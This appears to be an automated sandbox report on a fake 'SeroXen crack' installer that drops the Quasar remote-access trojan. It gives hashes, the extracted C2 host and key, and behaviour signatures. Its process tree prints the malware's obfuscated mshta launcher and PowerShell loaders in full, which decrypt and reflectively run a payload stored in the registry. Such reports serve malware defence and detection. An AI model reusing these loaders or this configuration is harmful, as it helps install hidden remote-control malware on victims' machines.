Overview

overview

10

Static

static

1

SeroXen Cr...ll.bat

windows7-x64

7

SeroXen Cr...ll.bat

windows10-2004-x64

10

Resubmissions

28/11/2024, 05:26

241128-f5dh3stlbl 10

28/11/2024, 05:24

241128-f317cstkfp 10

27/09/2024, 19:50

240927-ykppqayfma 10

20/08/2024, 17:46

240820-wcsqasyhjm 10

11/12/2023, 06:01

231211-gq31vsgbh3 10

Analysis

  • max time kernel
    31s
  • max time network
    39s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/08/2024, 17:46

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SeroXen Crack/SeroXen-install.bat

  • Size

    12.6MB

  • MD5

    898f49c739026123b6a3811fa31abe70

  • SHA1

    31ff6036b40d70d21cb1c4c0163cba0d4c720551

  • SHA256

    78b0a14a882dec287c0dc5a294ad02a4a5aaa0d130839d49f282c7d61069471f

  • SHA512

    a9aa2bf15db84361f315156ee6386cac49c14c2449a72e2f50b2e0b8d100781019c246c03a38a37d5dfc71a7c1c5451457faba074d1a875cab615ecb8d3e453d

  • SSDEEP

    49152:sW7ldCjqzV0qZpSjVbHDGYxqXTQPJee/X5nerh1gnfFijx6ygGSPlPNEIKlfuK1u:i

Score
10/10
quasarv2.2.5 | seroxendefense_evasiondiscoveryspywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.0.0.0

Botnet

v2.2.5 | SeroXen

C2

kimsoylak.ddns.net:4782

Mutex

2cc9d61f-950d-4f23-b7d5-45d9dda2f256

Attributes
  • encryption_key

    F467D794B2E1081B6AD1EAD5813AFA74F053248D

  • install_name

    .exe

  • log_directory

    $sxr-Logs

  • reconnect_delay

    1

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

    Clear Windows Event Logs to hide the activity of an intrusion.

    defense_evasion
  • Hide Artifacts: Hidden Window 1 TTPs 2 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

    defense_evasion
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 31 IoCs
  • Suspicious use of SendNotifyMessage 31 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:336
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{a2e7708b-3f5c-4c17-a07e-bee8d110f3d7}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4856
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{cf3412a0-f04a-43e3-bf3d-cfbf0a3cbfdc}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2784
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{7098aadb-c7a3-4e1b-90e0-c0145596dad8}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3496
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:672
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:956
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:436
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:692
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                1⤵
                  PID:1044
                  • C:\Windows\system32\taskhostw.exe
                    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                    2⤵
                      PID:2956
                    • C:\Windows\$sxr-mshta.exe
                      C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-jUsBURfHSoufmNeEAjpO4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
                      2⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • Modifies registry class
                      • Suspicious use of WriteProcessMemory
                      PID:4464
                      • C:\Windows\$sxr-cmd.exe
                        "C:\Windows\$sxr-cmd.exe" /c %$sxr-jUsBURfHSoufmNeEAjpO4312:&#<?=%
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:1124
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          4⤵
                            PID:916
                          • C:\Windows\$sxr-powershell.exe
                            C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function hufeg($iDMxb){ $Elzpw=[System.Security.Cryptography.Aes]::Create(); $Elzpw.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Elzpw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Elzpw.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk='); $Elzpw.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA=='); $wCTZr=$Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')(); $YgtPo=$wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iDMxb, 0, $iDMxb.Length); $wCTZr.Dispose(); $Elzpw.Dispose(); $YgtPo;}function FJcTY($iDMxb){ $KHdof=New-Object System.IO.MemoryStream(,$iDMxb); $mdDGq=New-Object System.IO.MemoryStream; $PZsap=New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::Decompress); $PZsap.CopyTo($mdDGq); $PZsap.Dispose(); $KHdof.Dispose(); $mdDGq.Dispose(); $mdDGq.ToArray();}function vUmWc($iDMxb,$PbTpW){ $YHPse=[System.Reflection.Assembly]::Load([byte[]]$iDMxb); $aMqIy=$YHPse.EntryPoint; $aMqIy.Invoke($null, $PbTpW);}$Elzpw1 = New-Object System.Security.Cryptography.AesManaged;$Elzpw1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$lkChZ = $Elzpw1.('rotpyrceDetaerC'[-1..-15] -join '')();$kveij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('skxuT638mXYXO82tnMu4Nw==');$kveij = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij, 0, $kveij.Length);$kveij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij);$uYwHJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7tPhtRoBPpmbD4jKqCrROmZ5ihpYMWVokvpj2Ng/Pz8=');$uYwHJ = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uYwHJ, 0, $uYwHJ.Length);$uYwHJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uYwHJ);$XPhKE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MN4dM3v9612JtLqaveCMYg==');$XPhKE = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XPhKE, 0, $XPhKE.Length);$XPhKE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XPhKE);$muibj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('omE0gz6POPNwhNmUAnPGH44LhwPPACLWik/KT0dk5wsKXAxtKag+L5FPGR5kaqhlGUck2HtfdRNBwrYMOEAetiGgAox0exmtDDnAYLadphZBvi4OP8B8BNL4k5y/z1AEr7oudmgyCQifH3aXxa/gUUa4xjDsSD2YTOub7PHlsdmqG91RSBUMJH4vfT2zptSsj0OSscQsY4xVPZ8OjeRKbzP+BjF+Uue1s9LcXQdrizsUEKJN4dY28g0skU19VzfudgJv7Qa+SS93YCgWa9n+oNhygZquca/xgmF4Z+su7WedF+8tBgUKzviRtdEdVgLq/OMSlirCLjvFnSHC2y9K1oTEEyD1mQB836kwPebOOTmBNH6vdn2bEQQYiF/vc3FItt5vYPuWyJGzUen95KOQjYu7YoPz/dFXDUgmI65vnuw=');$muibj = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($muibj, 0, $muibj.Length);$muibj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($muibj);$DHHcr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tYnkG6mWBgWnZf6oIR3L5A==');$DHHcr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DHHcr, 0, $DHHcr.Length);$DHHcr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DHHcr);$EQNXr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fF2zWzAZ0BefyD1XaGcLw==');$EQNXr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EQNXr, 0, $EQNXr.Length);$EQNXr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EQNXr);$mYQZS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3I7S8iNpJjrn0k9Lgckneg==');$mYQZS = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mYQZS, 0, $mYQZS.Length);$mYQZS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mYQZS);$DbkFT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8BsdeVWD9I78LbbRhRFrA==');$DbkFT = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DbkFT, 0, $DbkFT.Length);$DbkFT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DbkFT);$jgfOd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEFFbXtp5W2U1hAoq0CpPw==');$jgfOd = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jgfOd, 0, $jgfOd.Length);$jgfOd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jgfOd);$kveij0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1+Vym/OwDnC1v1RFNGQ5MA==');$kveij0 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij0, 0, $kveij0.Length);$kveij0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij0);$kveij1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1UB7UYof3ztQu3+ei666DQ==');$kveij1 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij1, 0, $kveij1.Length);$kveij1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij1);$kveij2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9594UuKb/Z+/WVWczIhxbQ==');$kveij2 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij2, 0, $kveij2.Length);$kveij2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij2);$kveij3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxkDZyakK1CM3mmPkfi6OQ==');$kveij3 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij3, 0, $kveij3.Length);$kveij3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij3);$lkChZ.Dispose();$Elzpw1.Dispose();if (@(get-process -ea silentlycontinue $kveij3).count -gt 1) {exit};$ebqGe = [Microsoft.Win32.Registry]::$DbkFT.$mYQZS($kveij).$EQNXr($uYwHJ);$SceND=[string[]]$ebqGe.Split('\');$sNXpr=FJcTY(hufeg([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[1])));vUmWc $sNXpr (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$GiWwX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[0]);$Elzpw = New-Object System.Security.Cryptography.AesManaged;$Elzpw.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$wCTZr = $Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')();$GiWwX = $wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GiWwX, 0, $GiWwX.Length);$wCTZr.Dispose();$Elzpw.Dispose();$KHdof = New-Object System.IO.MemoryStream(, $GiWwX);$mdDGq = New-Object System.IO.MemoryStream;$PZsap = New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::$kveij1);$PZsap.$jgfOd($mdDGq);$PZsap.Dispose();$KHdof.Dispose();$mdDGq.Dispose();$GiWwX = $mdDGq.ToArray();$cyNnW = $muibj | IEX;$YHPse = $cyNnW::$kveij2($GiWwX);$aMqIy = $YHPse.EntryPoint;$aMqIy.$kveij0($null, (, [string[]] ($XPhKE)))
                            4⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Executes dropped EXE
                            • Hide Artifacts: Hidden Window
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of SetWindowsHookEx
                            • Suspicious use of WriteProcessMemory
                            PID:2604
                            • C:\Windows\SysWOW64\dllhost.exe
                              C:\Windows\SysWOW64\dllhost.exe /Processid:{cabc3e3f-2326-4fd9-a3e2-1cfe03503f28}
                              5⤵
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3524
                            • C:\Windows\$sxr-powershell.exe
                              "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2604).WaitForExit();[System.Threading.Thread]::Sleep(5000); function hufeg($iDMxb){ $Elzpw=[System.Security.Cryptography.Aes]::Create(); $Elzpw.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Elzpw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Elzpw.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk='); $Elzpw.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA=='); $wCTZr=$Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')(); $YgtPo=$wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iDMxb, 0, $iDMxb.Length); $wCTZr.Dispose(); $Elzpw.Dispose(); $YgtPo;}function FJcTY($iDMxb){ $KHdof=New-Object System.IO.MemoryStream(,$iDMxb); $mdDGq=New-Object System.IO.MemoryStream; $PZsap=New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::Decompress); $PZsap.CopyTo($mdDGq); $PZsap.Dispose(); $KHdof.Dispose(); $mdDGq.Dispose(); $mdDGq.ToArray();}function vUmWc($iDMxb,$PbTpW){ $YHPse=[System.Reflection.Assembly]::Load([byte[]]$iDMxb); $aMqIy=$YHPse.EntryPoint; $aMqIy.Invoke($null, $PbTpW);}$Elzpw1 = New-Object System.Security.Cryptography.AesManaged;$Elzpw1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$lkChZ = $Elzpw1.('rotpyrceDetaerC'[-1..-15] -join '')();$kveij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('skxuT638mXYXO82tnMu4Nw==');$kveij = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij, 0, $kveij.Length);$kveij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij);$uYwHJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7tPhtRoBPpmbD4jKqCrROmZ5ihpYMWVokvpj2Ng/Pz8=');$uYwHJ = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uYwHJ, 0, $uYwHJ.Length);$uYwHJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uYwHJ);$XPhKE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MN4dM3v9612JtLqaveCMYg==');$XPhKE = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XPhKE, 0, $XPhKE.Length);$XPhKE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XPhKE);$muibj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('omE0gz6POPNwhNmUAnPGH44LhwPPACLWik/KT0dk5wsKXAxtKag+L5FPGR5kaqhlGUck2HtfdRNBwrYMOEAetiGgAox0exmtDDnAYLadphZBvi4OP8B8BNL4k5y/z1AEr7oudmgyCQifH3aXxa/gUUa4xjDsSD2YTOub7PHlsdmqG91RSBUMJH4vfT2zptSsj0OSscQsY4xVPZ8OjeRKbzP+BjF+Uue1s9LcXQdrizsUEKJN4dY28g0skU19VzfudgJv7Qa+SS93YCgWa9n+oNhygZquca/xgmF4Z+su7WedF+8tBgUKzviRtdEdVgLq/OMSlirCLjvFnSHC2y9K1oTEEyD1mQB836kwPebOOTmBNH6vdn2bEQQYiF/vc3FItt5vYPuWyJGzUen95KOQjYu7YoPz/dFXDUgmI65vnuw=');$muibj = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($muibj, 0, $muibj.Length);$muibj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($muibj);$DHHcr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tYnkG6mWBgWnZf6oIR3L5A==');$DHHcr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DHHcr, 0, $DHHcr.Length);$DHHcr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DHHcr);$EQNXr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fF2zWzAZ0BefyD1XaGcLw==');$EQNXr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EQNXr, 0, $EQNXr.Length);$EQNXr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EQNXr);$mYQZS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3I7S8iNpJjrn0k9Lgckneg==');$mYQZS = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mYQZS, 0, $mYQZS.Length);$mYQZS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mYQZS);$DbkFT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8BsdeVWD9I78LbbRhRFrA==');$DbkFT = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DbkFT, 0, $DbkFT.Length);$DbkFT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DbkFT);$jgfOd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEFFbXtp5W2U1hAoq0CpPw==');$jgfOd = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jgfOd, 0, $jgfOd.Length);$jgfOd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jgfOd);$kveij0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1+Vym/OwDnC1v1RFNGQ5MA==');$kveij0 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij0, 0, $kveij0.Length);$kveij0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij0);$kveij1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1UB7UYof3ztQu3+ei666DQ==');$kveij1 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij1, 0, $kveij1.Length);$kveij1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij1);$kveij2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9594UuKb/Z+/WVWczIhxbQ==');$kveij2 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij2, 0, $kveij2.Length);$kveij2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij2);$kveij3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxkDZyakK1CM3mmPkfi6OQ==');$kveij3 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij3, 0, $kveij3.Length);$kveij3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij3);$lkChZ.Dispose();$Elzpw1.Dispose();if (@(get-process -ea silentlycontinue $kveij3).count -gt 1) {exit};$ebqGe = [Microsoft.Win32.Registry]::$DbkFT.$mYQZS($kveij).$EQNXr($uYwHJ);$SceND=[string[]]$ebqGe.Split('\');$sNXpr=FJcTY(hufeg([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[1])));vUmWc $sNXpr (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$GiWwX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[0]);$Elzpw = New-Object System.Security.Cryptography.AesManaged;$Elzpw.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$wCTZr = $Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')();$GiWwX = $wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GiWwX, 0, $GiWwX.Length);$wCTZr.Dispose();$Elzpw.Dispose();$KHdof = New-Object System.IO.MemoryStream(, $GiWwX);$mdDGq = New-Object System.IO.MemoryStream;$PZsap = New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::$kveij1);$PZsap.$jgfOd($mdDGq);$PZsap.Dispose();$KHdof.Dispose();$mdDGq.Dispose();$GiWwX = $mdDGq.ToArray();$cyNnW = $muibj | IEX;$YHPse = $cyNnW::$kveij2($GiWwX);$aMqIy = $YHPse.EntryPoint;$aMqIy.$kveij0($null, (, [string[]] ($XPhKE)))
                              5⤵
                              • Executes dropped EXE
                              • Hide Artifacts: Hidden Window
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2172
                            • C:\Windows\SysWOW64\dllhost.exe
                              C:\Windows\SysWOW64\dllhost.exe /Processid:{31115667-fccc-4aef-88ea-be1cd49cbf3a}
                              5⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4896
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      1⤵
                        PID:1076
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                        1⤵
                          PID:1100
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1116
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            1⤵
                              PID:1244
                              • C:\Windows\system32\sihost.exe
                                sihost.exe
                                2⤵
                                  PID:2836
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                1⤵
                                  PID:1288
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                  1⤵
                                  • Indicator Removal: Clear Windows Event Logs
                                  PID:1296
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                  1⤵
                                    PID:1416
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                    1⤵
                                      PID:1448
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                      1⤵
                                        PID:1472
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                        1⤵
                                          PID:1544
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          1⤵
                                            PID:1612
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                            1⤵
                                              PID:1664
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                              1⤵
                                                PID:1672
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
